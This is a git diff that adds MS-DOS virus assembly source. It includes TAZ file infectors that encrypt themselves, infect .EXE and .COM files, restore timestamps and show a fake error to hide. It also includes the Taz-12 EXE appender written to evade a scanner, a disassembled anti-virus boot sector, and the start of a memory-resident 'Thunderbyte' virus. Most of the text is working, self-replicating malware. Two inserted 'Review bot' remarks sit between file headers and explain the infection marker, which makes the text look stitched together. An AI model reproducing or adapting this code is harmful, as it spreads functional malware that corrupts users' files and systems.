+virus_msg11 db cr,lf,tab," $"
+virus_msg12 db cr,lf,tab," $"
+virus_msg13 db cr,lf,tab," $"
+virus_msg14 db cr,lf,tab," $"
+virus_msg15 db cr,lf,tab," $"
+virus_msg16 db cr,lf,tab," $"
+virus_msg17 db cr,lf,tab," $"
+virus_msg18 db cr,lf,tab," $"
+virus_msg19 db cr,lf,tab," $"
+virus_msg20 db cr,lf,tab," $"
+virus_msg21 db cr,lf,tab," $"
+virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
+compare_buf db 20 dup (?) ; Buffer to compare files in
+files_found db ?
+files_infected db ?
+orig_time dw ?
+orig_date dw ?
+orig_attr dw ?
+handle dw ?
+success db ?
+
+random_mutation: ; First decide if virus is to mutate
+ mov ah,2ch ; Set up DOS function to get time
+ int 21h
+ cmp encrypt_val,0 ; Is this a first-run virus copy?
+ je install_val ; If so, install whatever you get.
+ cmp dh,30 ; Is it less than 30 seconds?
+ jg find_extension ; If not, don't mutate this time
+install_val:
+ cmp dl,0 ; Will we be encrypting using zero?
+ je random_mutation ; If so, get a new value.
+ mov encrypt_val,dl ; Otherwise, save the new value
+find_extension: ; Locate file w/ valid extension
+ mov files_found,0 ; Count infected files found
+ mov files_infected,4 ; BX counts file infected so far
+ mov success,0
+find_exe:
+ mov cx,00100111b ; Look for all flat file attributes
+ mov dx,offset exe_filespec ; Check for .EXE extension first
+ mov ah,4eh ; Call DOS find first service
+ int 21h
+ cmp ax,12h ; Are no files found?
+ je find_com ; If not, nothing more to do
+ call find_healthy ; Otherwise, try to find healthy .EXE
+find_com:
+ mov cx,00100111b ; Look for all flat file attributes
+ mov dx,offset com_filespec ; Check for .COM extension now
+ mov ah,4eh ; Call DOS find first service
+ int 21h
+ cmp ax,12h ; Are no files found?
+ je chdir ; If not, step back a directory
+ call find_healthy ; Otherwise, try to find healthy .COM
+chdir: ; Routine to step back one level
+ mov dx,offset newdir ; Load DX with address of pathname
+ mov ah,3bh ; Change directory DOS service
+ int 21h
+ dec files_infected ; This counts as infecting a file
+ jnz find_exe ; If we're still rolling, find another
+ jmp exit_virus ; Otherwise let's pack it up
+find_healthy:
+ mov bx,dta ; Point BX to address of DTA
+ mov ax,[bx]+attribute ; Get the current file's attribute
+ mov orig_attr,ax ; Save it
+ mov ax,[bx]+timestamp ; Get the current file's time stamp
+ mov orig_time,ax ; Save it
+ mov ax,[bx]+datestamp ; Get the current file's data stamp
+ mov orig_date,ax ; Save it
+ mov dx,dta+filename ; Get the filename to change attribute
+ mov cx,0 ; Clear all attribute bytes
+ mov al,1 ; Set attribute sub-function
+ mov ah,43h ; Call DOS service to do it
+ int 21h
+ mov al,2 ; Set up to open handle for read/write
+ mov ah,3dh ; Open file handle DOS service
+ int 21h
+ mov handle,ax ; Save the file handle
+ mov bx,ax ; Transfer the handle to BX for read
+ mov cx,20 ; Read in the top 20 bytes of file
+ mov dx,offset compare_buf ; Use the small buffer up top
+ mov ah,3fh ; DOS read-from-handle service
+ int 21h
+ mov bx,offset compare_buf ; Adjust the encryption value
+ mov ah,encrypt_val ; for accurate comparison
+ mov [bx+6],ah
+ mov si,code_start ; One array to compare is this file
+ mov di,offset compare_buf ; The other array is the buffer
+ mov ax,ds ; Transfer the DS register...
+ mov es,ax ; ...to the ES register
+ cld
+ repe cmpsb ; Compare the buffer to the virus
+ jne healthy ; If different, the file is healthy!
+ call close_file ; Close it up otherwise
+ inc files_found ; Chalk up another fucked up file
+continue_search:
+ mov ah,4fh ; Find next DOS function
+ int 21h ; Try to find another same type file
+ cmp ax,12h ; Are there any more files?
+ je no_more_found ; If not, get outta here
+ jmp find_healthy ; If so, try the process on this one!
+no_more_found:
+ ret ; Go back to where we came from
+healthy:
+ mov bx,handle ; Get the file handle
+ mov ah,3eh ; Close it for now
+ int 21h
+ mov ah,3dh ; Open it again, to reset it
+ mov dx,dta+filename
+ mov al,2
+ int 21h
+ mov handle,ax ; Save the handle again
+ call infect_file ; Infect the healthy file
+ call close_file ; Close down this operation
+ inc success ; Indicate we did something this time
+ dec files_infected ; Scratch off another file on agenda
+ jz exit_virus ; If we're through, terminate
+ jmp continue_search ; Otherwise, try another
+ ret
+close_file:
+ mov bx,handle ; Get the file handle off the stack
+ mov cx,orig_time ; Get the date stamp
+ mov dx,orig_date ; Get the time stamp
+ mov al,1 ; Set file date/time sub-service
+ mov ah,57h ; Get/Set file date and time service
+ int 21h ; Call DOS
+ mov bx,handle
+ mov ah,3eh ; Close handle DOS service
+ int 21h
+ mov cx,orig_attr ; Get the file's original attribute
+ mov al,1 ; Instruct DOS to put it back there
+ mov dx,dta+filename ; Feed it the filename
+ mov ah,43h ; Call DOS
+ int 21h
+ ret
+exit_virus:
+ cmp files_found,2 ; Are at least 2 files infected?
+ jl print_fake ; If not, keep a low profile
+ cmp success,0 ; Did we infect anything?
+ jg print_fake ; If so, cover it up
+ mov ah,09h ; Use DOS print string service
+ mov dx,offset virus_msg1 ; Load the address of the first line
+ int 21h ; Print it
+ mov dx,offset virus_msg2 ; Load the second line
+ int 21h ; (etc)
+ mov dx,offset virus_msg3
+ int 21h
+ mov dx,offset virus_msg4
+ int 21h
+ mov dx,offset virus_msg5
+ int 21h
+ mov dx,offset virus_msg6
+ int 21h
+ mov dx,offset virus_msg7
+ int 21h
+ mov dx,offset virus_msg8
+ int 21h
+ mov dx,offset virus_msg9
+ int 21h
+ mov dx,offset virus_msg10
+ int 21h
+ mov dx,offset virus_msg11
+ int 21h
+ mov dx,offset virus_msg12
+ int 21h
+ mov dx,offset virus_msg13
+ int 21h
+ mov dx,offset virus_msg14
+ int 21h
+ mov dx,offset virus_msg15
+ int 21h
+ mov dx,offset virus_msg16
+ int 21h
+ mov dx,offset virus_msg17
+ int 21h
+ mov dx,offset virus_msg18
+ int 21h
+ mov dx,offset virus_msg19
+ int 21h
+ mov dx,offset virus_msg20
+ int 21h
+jmp terminate
+print_fake:
+ mov ah,09h ; Use DOS to print fake error message
+ mov dx,offset fake_msg
+ int 21h
+terminate:
+ mov ah,4ch ; DOS terminate process function
+ int 21h ; Call DOS to get out of this program
+
+main endp
+code ends
+ end main
diff --git a/MSDOS/Virus.MSDOS.Unknown.taz-2276.asm b/MSDOS/Virus.MSDOS.Unknown.taz-2276.asm
new file mode 100644
index 00000000..dd923786
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.taz-2276.asm
@@ -0,0 +1,278 @@
+cr equ 13 ; This VIRUS was written 12-14-1992
+lf equ 10 ; AND QUIT READING MY SOURCE CODE
+tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG
+virus_size equ 2276 ; QUEERBAIT VIRUS TRACKER WANNA-BE!
+code_start equ 100h ; Address right after PSP in memory
+dta equ 80h ; Addr of default disk transfer area
+datestamp equ 24 ; Offset in DTA of file's date stamp
+timestamp equ 22 ; Offset in DTA of file's time stamp
+filename equ 30 ; Offset in DTA of ASCIIZ filename
+attribute equ 21 ; Offset in DTA of file attribute
+
+
+ code segment 'code' ; Open code segment
+ assume cs:code,ds:code ; One segment for both code & data
+ org code_start ; Start code image after PSP
+
+;---------------------------------------------------------------------
+; All executable code is contained in boundaries of procedure "main".
+; The following code, until the start of "virus_code", is the non-
+; encrypted CMT portion of the code to load up the real program.
+;---------------------------------------------------------------------
+main proc near ; Code execution begins here
+ call encrypt_decrypt ; Decrypt the real virus code
+ jmp random_mutation ; Put the virus into action
+
+encrypt_val db 00h ; Hold value to encrypt by here
+
+; ---------- Encrypt, save, and restore the virus code -----------
+infect_file:
+ mov bx,handle ; Get the handle
+ push bx ; Save it on the stack
+ call encrypt_decrypt ; Encrypt most of the code
+ pop bx ; Get back the handle
+ mov cx,virus_size ; Total number of bytes to write
+ mov dx,code_start ; Buffer where code starts in memory
+ mov ah,40h ; DOS write-to-handle service
+ int 21h ; Write the virus code into the file
+ call encrypt_decrypt ; Restore the code as it was
+ ret ; Go back to where you came from
+
+; --------------- Encrypt or decrypt the virus code ----------------
+encrypt_decrypt:
+ mov bx,offset virus_code ; Get address to start encrypt/decrypt
+xor_loop: ; Start cycle here
+ mov ah,[bx] ; Get the current byte
+ xor ah,encrypt_val ; Engage/disengage XOR scheme on it
+ mov [bx],ah ; Put it back where we got it
+ inc bx ; Move BX ahead a byte
+ cmp bx,offset virus_code+virus_size ; Are we at the end?
+ jle xor_loop ; If not, do another cycle
+ ret ; and go back where we came from
+
+;-----------------------------------------------------------------------
+; The rest of the code from here on remains encrypted until run-time,
+; using a fundamental XOR technique that changes via CMT.
+;-----------------------------------------------------------------------
+virus_code:
+
+;----------------------------------------------------------------------------
+; All strings are kept here in the file, and automatically encrypted.
+; Please don't be a lamer and change the strings and say you wrote a virus.
+; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
+; changes, even when the strings stay the same.
+;----------------------------------------------------------------------------
+exe_filespec db "*.EXE",0
+com_filespec db "*.COM",0
+newdir db "..",0
+fake_msg db cr,lf,"Program too big to fit in memory $"
+virus_msg1 db cr,lf,"*TAKE THE DAY OFF COMPLIMENTS OF THE TAZMANIAN DEVIL AND ô Wsl!!* $"
+virus_msg2 db cr,lf,"ADH ADH ADH ADH ADH ADHADH ADH ADH ADH ADH ADH ADH ADH ADH ADH $"
+virus_msg3 db cr,lf,"ADH ADH ADH ADH ADH A ADH ADH ADH ADH ADH ADH ADH ADH ADH $"
+virus_msg4 db cr,lf,"ADH ADH ADH ADH ADH DH ADH ADH ADH $"
+virus_msg5 db cr,lf,"ADH ADH ADH AD ADH ADH AD AD AH AD ADH $"
+virus_msg6 db cr,lf,"ADH ADH ADH A H ADH AD ADH AH ADH $"
+virus_msg7 db cr,lf,"ADH ADH ADH ADH AD AD AH DH ADH $"
+virus_msg8 db cr,lf,"ADH ADH ADH H AD AD AHADH $"
+virus_msg9 db cr,lf,"ADH ADH AD ADH ADH ADH ADH ADH $"
+virus_msg10 db cr,lf,"ADH ADH A DH ADH ADH ADH ADH $"
+virus_msg11 db cr,lf,"ADH ADH ADH ADH ADH ADH$"
+virus_msg12 db cr,lf,"ADH ADH AADH ADH ADH ADH$"
+virus_msg13 db cr,lf,"ADH ADH AD H ADH ADH ADH$"
+virus_msg14 db cr,lf,"ADH ADADH A DH ADH ADH ADH$"
+virus_msg15 db cr,lf,"ADH ADH ADH H ADH ADH ADH ADH ADH$"
+virus_msg16 db cr,lf,"ADH ADH ADH ADH H ADH ADH ADH ADH AHD ADH$"
+virus_msg17 db cr,lf,"ADH ADH ADH AD ADH H ADH ADH ADH ADH ADH ADH$"
+virus_msg18 db cr,lf,"ADH ADH H ADH ADDH ADH ADH ADH ADH ADH ADH$"
+virus_msg19 db cr,lf,"ADADH ADH ADH ADH ADH ADH ADH$"
+virus_msg20 db cr,lf,"DH ADH ADH ADH ADH ADH$"
+virus_msg21 db cr,lf,"AADH ADH ADH ADH ADH ADH ADH$"
+virus_msg22 db cr,lf,"AD DH ADH ADH ADH ADH ADH AD ADH ADH ADH$"
+virus_msg23 db cr,lf,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector$"
+compare_buf db 20 dup (?) ; Buffer to compare files in
+files_found db ?
+files_infected db ?
+orig_time dw ?
+orig_date dw ?
+orig_attr dw ?
+handle dw ?
+success db ?
+
+random_mutation: ; First decide if virus is to mutate
+ mov ah,2ch ; Set up DOS function to get time
+ int 21h
+ cmp encrypt_val,0 ; Is this a first-run virus copy?
+ je install_val ; If so, install whatever you get.
+ cmp dh,15 ; Is it less than 16 seconds?
+ jg find_extension ; If not, don't mutate this time
+install_val:
+ cmp dl,0 ; Will we be encrypting using zero?
+ je random_mutation ; If so, get a new value.
+ mov encrypt_val,dl ; Otherwise, save the new value
+find_extension: ; Locate file w/ valid extension
+ mov files_found,0 ; Count infected files found
+ mov files_infected,4 ; BX counts file infected so far
+ mov success,0
+find_exe:
+ mov cx,00100111b ; Look for all flat file attributes
+ mov dx,offset exe_filespec ; Check for .EXE extension first
+ mov ah,4eh ; Call DOS find first service
+ int 21h
+ cmp ax,12h ; Are no files found?
+ je find_com ; If not, nothing more to do
+ call find_healthy ; Otherwise, try to find healthy .EXE
+find_com:
+ mov cx,00100111b ; Look for all flat file attributes
+ mov dx,offset com_filespec ; Check for .COM extension now
+ mov ah,4eh ; Call DOS find first service
+ int 21h
+ cmp ax,12h ; Are no files found?
+ je chdir ; If not, step back a directory
+ call find_healthy ; Otherwise, try to find healthy .COM
+chdir: ; Routine to step back one level
+ mov dx,offset newdir ; Load DX with address of pathname
+ mov ah,3bh ; Change directory DOS service
+ int 21h
+ dec files_infected ; This counts as infecting a file
+ jnz find_exe ; If we're still rolling, find another
+ jmp exit_virus ; Otherwise let's pack it up
+find_healthy:
+ mov bx,dta ; Point BX to address of DTA
+ mov ax,[bx]+attribute ; Get the current file's attribute
+ mov orig_attr,ax ; Save it
+ mov ax,[bx]+timestamp ; Get the current file's time stamp
+ mov orig_time,ax ; Save it
+ mov ax,[bx]+datestamp ; Get the current file's data stamp
+ mov orig_date,ax ; Save it
+ mov dx,dta+filename ; Get the filename to change attribute
+ mov cx,0 ; Clear all attribute bytes
+ mov al,1 ; Set attribute sub-function
+ mov ah,43h ; Call DOS service to do it
+ int 21h
+ mov al,2 ; Set up to open handle for read/write
+ mov ah,3dh ; Open file handle DOS service
+ int 21h
+ mov handle,ax ; Save the file handle
+ mov bx,ax ; Transfer the handle to BX for read
+ mov cx,20 ; Read in the top 20 bytes of file
+ mov dx,offset compare_buf ; Use the small buffer up top
+ mov ah,3fh ; DOS read-from-handle service
+ int 21h
+ mov bx,offset compare_buf ; Adjust the encryption value
+ mov ah,encrypt_val ; for accurate comparison
+ mov [bx+6],ah
+ mov si,code_start ; One array to compare is this file
+ mov di,offset compare_buf ; The other array is the buffer
+ mov ax,ds ; Transfer the DS register...
+ mov es,ax ; ...to the ES register
+ cld
+ repe cmpsb ; Compare the buffer to the virus
+ jne healthy ; If different, the file is healthy!
+ call close_file ; Close it up otherwise
+ inc files_found ; Chalk up another fucked up file
+continue_search:
+ mov ah,4fh ; Find next DOS function
+ int 21h ; Try to find another same type file
+ cmp ax,12h ; Are there any more files?
+ je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,2 ; Are at least 6 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? 
+ jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + mov dx,offset virus_msg5 + int 21h + mov dx,offset virus_msg6 + int 21h + mov dx,offset virus_msg7 + int 21h + mov dx,offset virus_msg8 + int 21h + mov dx,offset virus_msg9 + int 21h + mov dx,offset virus_msg10 + int 21h + mov dx,offset virus_msg11 + int 21h + mov dx,offset virus_msg12 + int 21h + mov dx,offset virus_msg13 + int 21h + mov dx,offset virus_msg14 + int 21h + mov dx,offset virus_msg15 + int 21h + mov dx,offset virus_msg16 + int 21h + mov dx,offset virus_msg17 + int 21h + mov dx,offset virus_msg18 + int 21h + mov dx,offset virus_msg19 + int 21h + mov dx,offset virus_msg20 + int 21h + mov dx,offset virus_msg21 + int 21h + mov dx,offset virus_msg22 + int 21h + mov dx,offset virus_msg23 + int 21h + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.taz12.asm b/MSDOS/Virus.MSDOS.Unknown.taz12.asm new file mode 100644 index 00000000..da4c6ce7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taz12.asm 
@@ -0,0 +1,252 @@ +cseg segment byte public 'code' + assume cs:cseg, ds:cseg + + org 100h + +start_of_virus: + + call get_offset +get_offset: ;alternative way to get the delta + mov di,sp ;offset without activating any flags in + mov bp,word ptr ss:[di] ;TB-scan + sub bp,offset get_offset + inc sp + inc sp + + push ds ;save es & ds + push es + push cs ;and point ds to code segment + pop ds + + call encrypt_decrypt ;decrypt contents of file + +start_of_encryption: + cld ;clear direction flag + + mov ah,1ah ;set new dta area + lea dx,[bp+dta_area] + int 21h + + mov bx,es + push cs ;es points to code segment + pop es + + lea si,[bp+return2_buffer] ;this code prepares the return code + lea di,[bp+return_buffer] + movsw ;transfer buffer contents + lodsw + add ax,bx ;bx holds start es = psp + add ax,10h + stosw + +; lea di,[bp+stack_return] +; lea si,[bp+stack_save] ;si already points to stack_save + add di,8 ;saving a byte with this code + lodsw ;prepares the restore of ss/sp + add ax,bx + add ax,10h + stosw + movsw + + + mov ah,47h ;save starting directory + xor dl,dl + lea si,[bp+save_dir] + int 21h + +find_new_files: ;start finding files + mov ah,4eh + mov cx,7 + lea dx,[bp+search_pattern] +find_files: + int 21h + + jnc open_file ;if found a file + lea dx,[bp+dir_mask] ;else change directory + mov ah,3bh + int 21h + jnc find_new_files + jmp no_more_files ;end of all files + +open_file: ;open the found file + mov ax,3d02h + lea dx,[bp+dta_area+1eh] + int 21h + + xchg ax,bx ;file handle in bx + + mov ah,3fh ;read the exe header to exe_header + mov cx,18h + lea dx,[bp+exe_header] + int 21h + + lea si,[bp+exe_header] ;check if it's really a executable + lodsw + cmp ax,'ZM' + je check_infected + cmp ax,'MZ' + je check_infected + jmp no_exe ;else jump + +check_infected: + + add si,10h ;saving another byte +; lea si,[bp+exe_header+12h] + lodsw + cmp ax,'Ri' ;is it already infected? 
+ jne start_infect + jmp already_infected + + +start_infect: + lea di,[bp+return2_buffer] ;put the files ip/cs in return2_buffer + movsw + movsw + + lea si,[bp+exe_header+0eh] ;save the files ss/sp in stack_save + movsw + movsw + + lea di,[bp+exe_header+12h] ;mark the file infected + mov ax,'Ri' + stosw + + mov al,2 ;go to end_of_file + call go_eof ;dx/ax is file length at return + + mov cx,10h ;use div to save bytes instead of speed + div cx + sub ax,word ptr ds:[bp+exe_header+8] + xchg dx,ax + stosw ;put new ip/cs in exe_header + xchg dx,ax + stosw + + inc ax ;put new suitable ss/sp in exe_header + inc ax + mov word ptr [bp+exe_header+0eh],ax + mov word ptr [bp+exe_header+10h],4b0h + + + mov ah,2ch ;get system time for random number + int 21h + xor dh,dh ;just alter the code a little bit + or dl,00001010b ;with encryption so TB-scan wont't + mov word ptr [bp+encryption_value],dx ;find garbage instruction + + mov ah,40h ;prepare to append virus to file + lea dx,[bp+start_of_virus] + call append_virus ;call it + + mov al,2 ;go to end of file + call go_eof + + mov cx,512 ;get filesize in 512 modules + div cx + inc ax + mov word ptr [bp+exe_header+2],dx ;put modulo/filesize in + mov word ptr [bp+exe_header+4],ax ;exe header + + + xor al,al ;go to beginning of file + call go_eof + + mov ah,40h ;write new exe header + mov cx,18h + lea dx,[bp+exe_header] + int 21h + + lea si,[bp+dta_area+16h] ;restore time/date stamp + mov cx,word ptr [si] + mov dx,word ptr [si+2] + mov ax,5701h + int 21h + +already_infected: +no_exe: + + mov ah,3eh ;close file + int 21h + + mov ax,4301h ;restore file attribute + mov cl,byte ptr [bp+dta_area+15h] + lea dx,[bp+dta_area+1eh] + int 21h + + mov ah,4fh ;find next file + jmp find_files + +no_more_files: + + lea dx,[bp+save_dir] ;restore starting directory + mov ah,3bh + int 21h + + pop es ;shrink memory block + mov ah,4ah + mov bx,10000 + int 21h + push es + + mov ah,48h ;allocate a new 3k block + mov bx,192 + int 21h + jc no_mem + dec ax + 
mov es,ax + mov word ptr es:[1],0008h ;mark DOS as owner and it will +no_mem: ;reduce available memory to DOS + + pop es ;restore old es/ds + pop ds + + cli ;must use this before altering ss/sp + mov ss,word ptr cs:[bp+stack_return] ;put back original ss/sp + mov sp,word ptr cs:[bp+stack_return+2] + sti ;interrupts allowed again + +end_part: +db 0eah ;jmp to original ip +return_buffer db 0,0,0,0 +return2_buffer dw 0,0fff0h ;code for carrier file to exit +stack_save dd ? +stack_return dd ? +dir_mask db '..',0 +search_pattern db '*.exe',0 +signature db "Taz-12 (C) 94 by Sector Infector!" +go_eof: ;procedure to go to beginning and + mov ah,42h ;end of file + xor cx,cx ;this saves a few bytes as it's + cwd ;used a few times + int 21h + ret +end_of_encryption: +pad db 0 ;pad out a byte so first byte of + ;encryption value won't be overwritten +encryption_value dw 0 + +encrypt_decrypt: ;cryptation routine + mov si,word ptr [bp+encryption_value] + lea di,[bp+start_of_encryption] + mov cx,(end_of_encryption-start_of_encryption+1)/2 +crypt_loop: + xor word ptr [di],si + inc di + inc di + loop crypt_loop + ret + +append_virus: + call encrypt_decrypt ;encrypt virus before write + mov cx,end_of_virus-start_of_virus ;cx is length of virus + int 21h ;call 40h + call encrypt_decrypt ;decrypt virus again + ret +end_of_virus: +exe_header db 18h dup(?) ;don't need to copy this shit +dta_area db 43 dup(?) ;to the next file to infect +save_dir db 64 dup(?) ;return adress is already saved! +cseg ends +end start_of_virus + + diff --git a/MSDOS/Virus.MSDOS.Unknown.tboot.asm b/MSDOS/Virus.MSDOS.Unknown.tboot.asm new file mode 100644 index 00000000..e2322395 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tboot.asm 
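Review bot: The word written at `exe_header+12h` by `mov ax,'Ri'` / `stosw` is the file's self-recognition marker and the comment should name the field: offset 12h of the MZ header is the header checksum (e_csum), which DOS does not validate, and it is exactly what the earlier `cmp ax,'Ri'` check reads back on the next pass; `; e_csum field: 'Ri' = already-infected marker` would say so. Because it sits at a fixed header offset, that marker is also the natural anchor for a scanner or triage script looking for affected files. The `;allocate a new 3k block` comment on the 48h call would be clearer as bytes, since `mov bx,192` is a paragraph count (192*16 = 3072 bytes).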
@@ -0,0 +1,171 @@ +;This is a disassembly of Thunderbyte's anti-viral partition code. +;An org statement was not used because it appears that all offsets used +;herein are either relative or absolute, i.e. it just doesn't matter. +;This should be compiled as a binary image file, it *WILL NOT* create +;an executable file. This code is exactly 512 bytes long and should be +;implanted into the hard drive at physical sector 1, cylinder 0, head 0 +;using the BIOS direct write to disk function. *DO NOT* use DOS write to +;disk functions or DEBUG because these functions can't access hidden sectors +;and you'll probably just overwrite the disk drive. + +;have fun, folks! + +code_start: + + cli ;no interrupts + xor cx, cx + mov ss, cx + mov sp, 7c00h + mov si, sp + sti + cld + + mov es, cx ;cs already equals 0 + mov ds, cx + + mov di, 0600h ; + + mov ch, 01 ;cx = 100h + repz movsw ;mov 200h bytes from 0000:7c00h to 0000:0600h + ;to make room for boot sector + +jump_pt db 0e9h, 00, 8ah ;this will act like far jmp to first_pt label + ;i.e. 0000:061ah, wraps around segment +first_pt: ;when execution continues, this will be offset + ;061ah here + mov si, 06ddh + call routine_1 + mov si, 07eeh + call routine_2 + mov bp, si + mov si, 0733h + jb second_pt + + mov bx, sp ;buffer at stack pointer (7c00h?) + mov ax, 0201h ;func 2, 1 sector - possibily boot sector? 
+ int 13h ;BIOS read sector + + mov si, 0725h +second_pt: + jb sixth_pt + + mov si, 745h + call routine_1 + call routine_1 + + mov si, 7c40h + mov cx, 01c0h +loop_1: + xchg ax, bx + shl bx, 1 + lodsb ;from 0000:7c40h + add ax, bx + mov ah, bh + test ah, ah + jns third_pt + xor ax, 0a097h +third_pt: + loop loop_1 + + cmp ax, 7805h + jnz fourth_pt + mov si, 0740h + call routine_1 + + mov si, 0762h + call 01cdh + mov dx, [si + 0fc9fh] + cmp dx, 27eh + jb fourth_pt + + mov si, 740h + call routine_1 + mov si, 774h + call routine_1 + + les ax, [004c] + mov bx, es + mov cl, 04 + shr ax, cl + add ax, bx + inc cx + inc cx + shl dx, cl + cmp ax, dx + jnb fifth_pt + +fourth_pt: + mov si, 0787h + call routine_1 + int 16h + mov si, 783h + or al, 20h + cmp al, 79h + jnz seventh_pt + +fifth_pt: + call routine_1 + mov si, bp + mov dx, [si] + jmp sp ;control goes to boot sector + +sixth_pt: + call routine_1 + int 16h + +seventh_pt: + int 18h ;rom BASIC! + +eighth_pt: + jmp eighth_pt ;infinite loop Lock Up! + + +routine_2: + lea di, [si - 30h] +boot_chk: + cmp byte ptr [si], 80h ;looks like check for bootable parttn + jz bootable + sub si, 10h + cmp si, di + jnb boot_chk + ret +bootable: + mov dx, [si] + mov cx, [si + 2] +return_pt: + ret + +routine_1: + lodsb + cbw ;convert to word + test ax, ax ;huh? + jz return_pt ;like ret to original caller + + mov ah, 0eh + xor bx, bx + push si + int 10h + pop si + jmp routine_1 + +code_end: + + msg1 db 13, 10, "Thunderbyte anti-virus partition " + db "v6.24 (C) 1993-94 Thunderbyte BV.", 13, 10, 10, 0 + msg2 db "Disk error!", 13, 10, 00 + msg3 db "No system!", 13, 10, 00 + msg4 db "OK!", 13, 10,"Checking ",0 + msg5 db "bootsector CRC -> ",0 + msg6 db "available RAM -> ",0 + msg7 db "INT 13h -> ",0 + msg8 db "OK!",13, 10, 10, 0 + msg9 db "Failed!", 13, 10, "System might be infected. Continue? 
(N/Y)", 07, 0 + + misc db 0, 0, 0, 80h, 01h, 01, 0, 06, 0dh, 0feh, 0f8h + db 03eh, 0, 0, 0, 06h, 78h, 0dh, 0, 0, 0 + db 10h dup(0) + db 10h dup(0) + db 0eh dup(0) + + id_sig db 55h, 0aah + diff --git a/MSDOS/Virus.MSDOS.Unknown.tbyte.asm b/MSDOS/Virus.MSDOS.Unknown.tbyte.asm new file mode 100644 index 00000000..311f3943 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tbyte.asm 
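Review bot: The `;huh?` on `test ax, ax` in routine_1 leaves unexplained the one thing a reader needs: after `lodsb` / `cbw` it is the NUL-terminator test for the message strings (every `msgN` ends in 0), and `jz return_pt` is the loop exit, so `; end of 0-terminated string -> return` should replace it. routine_1 is the BIOS teletype print loop (`mov ah, 0eh` / `int 10h`) and deserves a one-line header, since nearly every path calls it. The absolute operands such as `mov si, 06ddh` and `mov di, 0600h` only make sense after the `repz movsw` relocation to 0000:0600h, which the file header should state explicitly as the addressing assumption for the whole listing.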
@@ -0,0 +1,612 @@ +;*****************************************************************************; +; ; +; Tunderbyte Virus ; +; ; +; TBSCAN.DAT : DB3F00807609??4D75F9 ; +; ; +;*****************************************************************************; + +virus segment public 'code' + assume cs:virus, ds:virus, es:virus + org 0 + +VirusStart equ $ +VirusSize1 equ (VirusEnd1-$) +VirusSize2 equ (VirusEnd2-$) + +Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0 + db 80h,76h,Decrypt2-VirusStart-1,0 + db 4dh,75h,-7 +Decrypt2: cli + mov sp,offset DoAgain-2 + ret -8 + + db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0 + +Init: mov cx,(VirusEnd1-StartEncrypt+1)/2 + mov dl,byte ptr cs:Decrypt1[6] + mov dh,dl + mov si,offset StartEncrypt +NotReady: ret 2 + +DecryptWord: mov ax,ss:[si] + xor cs:[si],dx +NextWord: add dx,ax + inc si + ret -4 + + dw DecryptWord + dw DoAgain + dw NextWord + dw Init +DoAgain: loop NotReady + +StartEncrypt equ $ + +Main: mov sp,1000h + sti + push ds + push es + mov ax,03031h + mov bx,0DEADh + int 21h + cmp ax,0DEADh + jne Install + jmp Exit +Install: push es + mov ah,52h + int 21h + mov ax,es:[bx-2] + mov cs:FirstMCB,ax + pop es +CheckBlock: mov ds,ax + inc ax + cmp word ptr ds:[1],ax + jne NextBlock + cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h) + jne NextBlock + push ax + push es + mov cx,VirusSize2 + xor di,di + mov es,ax + mov al,es:[di] + cld + repe scasb + pop es + pop ax + je CopyVirus +NextBlock: add ax,ds:[3] + cmp byte ptr ds:[0],'Z' + jne CheckBlock + mov ah,4ah + mov bx,-1 + int 21h + mov ah,4ah + sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1 + int 21h + mov ah,48h + mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h) + int 21h +CopyVirus: push cs + pop ds + dec ax + mov es,ax + inc ax + mov es:[1],ax + mov cx,8 + mov si,offset CommandStr + mov di,cx + cld + rep movsb + mov es,ax +EncryptZero: inc byte ptr ds:Decrypt1[6] + jz EncryptZero + mov cx,VirusSize2 + xor si,si + xor di,di + cld + rep movsb + push es + 
